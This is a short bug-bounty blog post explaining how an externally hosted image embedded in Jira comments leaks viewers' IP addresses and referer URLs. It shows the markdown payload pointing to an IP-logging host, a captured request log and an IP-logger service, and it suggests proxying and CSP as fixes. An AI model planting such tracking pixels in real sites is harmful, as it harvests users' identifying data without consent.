Sergey Kashatov
Apr 24, 2019 · 3 min read

Hello, my name is Sergey, and I do security research and hunt for bugs.

Now I want to tell you about one vulnerability, about which few people know, and for which you can earn good money.

I call it like this, "Pixel that steals your data." (It sounds very funny)

With this vulnerability, I was able to earn good money, I will show you my reports with this error.

1
2
3
4

So what is the vulnerability?

1. The fact is that each site has some forms for data exchange? for example comments, biographies, messages.

For example, take Jira

I inserted a picture using markdown “ !test.jpg|thumbnail!”

Let’s try uploading an image from another resource (Jira itself does not offer this feature.)

Now I will generate a trap of IP addresses on my site.

!https://site.one/hl/1556067225_d83d0cccc5e87cbe5c!

Instantly on my server came the entrance.

GET from 46.158.xxx.xxx

Accept-Language: ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7
Accept-Encoding: gzip, deflate, br
Referer: https://jira.site.ru/projects/PART/issues/PART-97?fi..
Accept: image/webp,image/apng,image/*,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Connection: keep-alive
Host: site.one
Content-Length:
Content-Type:

Now, if we send this comment with a loaded picture from my site, everyone who sees this will give me their data

To create such a picture, you can use this service.

https://iplogger.org/

The fact is that many developers do not think about such trifles.You can fix this in different ways, but in my opinion, it would be better if you proxy all objects from third-party resources and create a CSP.

This error will be accepted by programs only if you can easily steal data from the user, for example, if you find such an error in chat messages (where people communicate), you will be able to steal the IP addresses of your interlocutors in large quantities. Then it will be accepted.

Attention! Each site has its own markup, I used a special payload for Attlassian Jira!

HackerOne: https://hackerone.com/iframe

Twitter: https://twitter.com/iframe0x01 Have a good hunting)

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store